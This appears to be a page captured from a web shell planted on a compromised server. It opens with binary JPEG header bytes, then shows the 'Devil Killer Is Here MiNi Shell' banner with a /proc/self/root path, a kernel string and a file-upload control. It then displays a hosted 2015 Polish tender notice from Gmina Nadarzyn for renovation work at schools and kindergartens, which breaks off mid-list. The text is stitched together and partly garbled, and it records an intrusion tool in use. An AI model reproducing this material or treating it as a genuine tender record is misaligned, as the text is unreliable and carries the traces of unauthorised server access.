JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150702/163366-N-2015.html

<p class="kh_header"><b>Nadarzyn: ROBOTY REMONTOWE, OGÓLNOBUDOWLANE W PLACÓWKACH OŚWIATOWYCH, NALEŻĄCYCH DO GMINY NADARZYN, w tym:
Zadanie nr 1.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W MŁOCHOWIE
Zadanie nr 2.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W WOLI KRAKOWIAŃSKIEJ
Zadanie nr 3.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY
Zadanie nr 4. ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE
Zadanie nr 5.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W MŁOCHOWIE</b><br>
<b>Numer ogłoszenia: 163366 - 2015; data zamieszczenia: 02.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nadarzyn , ul. Mszczonowska 24, 05-830 Nadarzyn, woj. mazowieckie, tel. 22 7298185, faks 22 7298175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.nadarzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY REMONTOWE, OGÓLNOBUDOWLANE W PLACÓWKACH OŚWIATOWYCH, NALEŻĄCYCH DO GMINY NADARZYN, w tym:
Zadanie nr 1.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W MŁOCHOWIE
Zadanie nr 2.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W WOLI KRAKOWIAŃSKIEJ
Zadanie nr 3.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY
Zadanie nr 4. ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE
Zadanie nr 5.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W MŁOCHOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są: 
ROBOTY REMONTOWE, OGÓLNOBUDOWLANE W PLACÓWKACH OŚWIATOWYCH, NALEŻĄCYCH DO GMINY NADARZYN, w tym:

Zadanie nr 1. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W MŁOCHOWIE obejmujące:
- Dostawa i montaż membrany wiatrochronnej paroprzepuszczalnej instalowanej od strony strychu
- Malowanie klasy I (Malowanie ścian i sufitów farbą lateksową odporną na szorowanie)
- Remont cokołu budynku Sali gimnastycznej
- remont opaski wokół budynku Sali gimnastycznej

Zadanie nr 2.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W WOLI KRAKOWIAŃSKIEJ obejmujące:
- Remont cokołu zewnętrznego szkoły (okładzina z płytek klinkierowych - kolorystyka dostosowana do okładziny już istniejącej)
- Remont kominów - części ponad połacią dachu (rozbiórka istniejących kominów oraz wykonanie ich z cegły klinkierowej)
- Malowanie sal lekcyjnych nr 6, 7 oraz ścian szczytowych Sali gimnastycznej. Malowanie ścian i sufitów farbą lateksową odporną na szorowanie dodatkowo do wysokości 1,5m

Zadanie nr 3.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY obejmujące:
- Wykonanie obudowy grzejników w salach dydaktycznych, szatni oraz sali gimnastycznej
- Naprawa uszkodzonej ościeżnicy drzwi wejściowych polegająca na wymianie całej ościeżnicy (ościeżnica dostosowana do istniejącego skrzydła systemowego drewnianego z wręgiem francuskim) 
- Malowanie (pomieszczenia Sołeckiego) oraz pionu kuchennego. Malowanie ścian i sufitów farbą lateksową odporną na szorowanie dodatkowo do wysokości 1,5m

Zadanie nr 4.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA 
W NADARZYNIE obejmujące:
- wydzielenie altany śmietnikowej (obrodzenie wykonane z kształtowników stalowych malowanych proszkowo, dostawa i montaż furtki wejściowej wykonanej z kształtowników stalowych malowanych proszkowo oraz dostawa i montaż bramy dwuskrzydłowej umożliwiającej swobodne wprowadzanie pojemników typu BÓBR. Podłoże wyłożone kostka brukowa wraz z krawężnikami.
- montaż drzwi w pomieszczeniu piwnicy (drzwi są materiałem inwestora)
- wykonanie dwu placów zabaw o nawierzchni trawiastej (w ramach zadania należy wykonać nawodnienie systemowe  sterowane elektroniczni, Istniejące wyposażenie placów zabaw zostanie zdemontowane i po przeglądzie generalnym zainstalowane powtórnie.  

Zadanie nr 5.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA        W MŁOCHOWIE obejmujące:
- Cyklinowanie parkietu w sali oddziału wraz z wymianą listew przyściennych i wykonaniem powłoki ochronnej olejowej
- wydzielenie części korytarza na pomieszczenie postoju wózków transportowych kuchennych, ścianką systemową przesuwną
- Wymiana drzwi zewnętrznych wejściowych - wstawienie  antywłamaniowych klasy C - 2szt
- Dostawa i montaż dodatkowej barierki stalowej malowanej proszkowo na schodach wejścia głównego.

2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną   i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.
3.  Na wykonane roboty Wykonawca udzieli co najmniej 24- miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru robót.
4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 5),
3)	wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.43.00.00-0, 45.33.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali : co najmniej 3 roboty budowlane związane z wykonaniem remontów, przebudowy, obiektów kubaturowych, wykonanych w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych 
1.2. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

1.3. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Za najważniejsze roboty uznaje się roboty niezbędne do wykazanie spełniania warunku określonego w pkt 1.1. ppkt.2 SIWZ.
a)	Dowodami potwierdzającymi czy roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, są:
- poświadczenie lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. 
b)	Jeżeli Zamawiający (Gmina Nadarzyn) jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie - załączniku nr 3, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)	W razie konieczności, szczególnie gdy wykaz robót lub dowody potwierdzające czy roboty zostały wykonane w sposób należyty, lub czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
UWAGA! Treść zobowiązania podmiotu trzeciego  powinna jednoznacznie określać : 
a) kto jest podmiotem udostępniającym i przyjmującym zasoby, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Wzór zobowiązania podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 8 do SIWZ.

4) Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia

5) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b ustawy Prawo zamówień publicznych, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>będzie dysponował w realizacji zamówienia osobami w specjalności: 
- Kierownik robót budowlanych - min. 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, wydane zgodnie z art.12 ust.2 ustawy z dnia 7 lipca 1994r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie wystarczającym do kierowania robotami; 
W przypadku Wykonawców zagranicznych - uprawnienia równoważne do kierowania robotami;
1.2. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

1.3. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
3) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;

4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
UWAGA! Treść zobowiązania podmiotu trzeciego  powinna jednoznacznie określać : 
a) kto jest podmiotem udostępniającym i przyjmującym zasoby, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Wzór zobowiązania podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 8 do SIWZ.

5) Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia

6) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b ustawy Prawo zamówień publicznych, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres udzielonej gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę postanowień umowy zgodnie z wymogami art. 144 ustawy z dnia 29 stycznia 2004r Prawo Zamówień Publicznych (t.j. Dz. U. z 2013 poz. 907 ze zm.), w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1, Wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, 
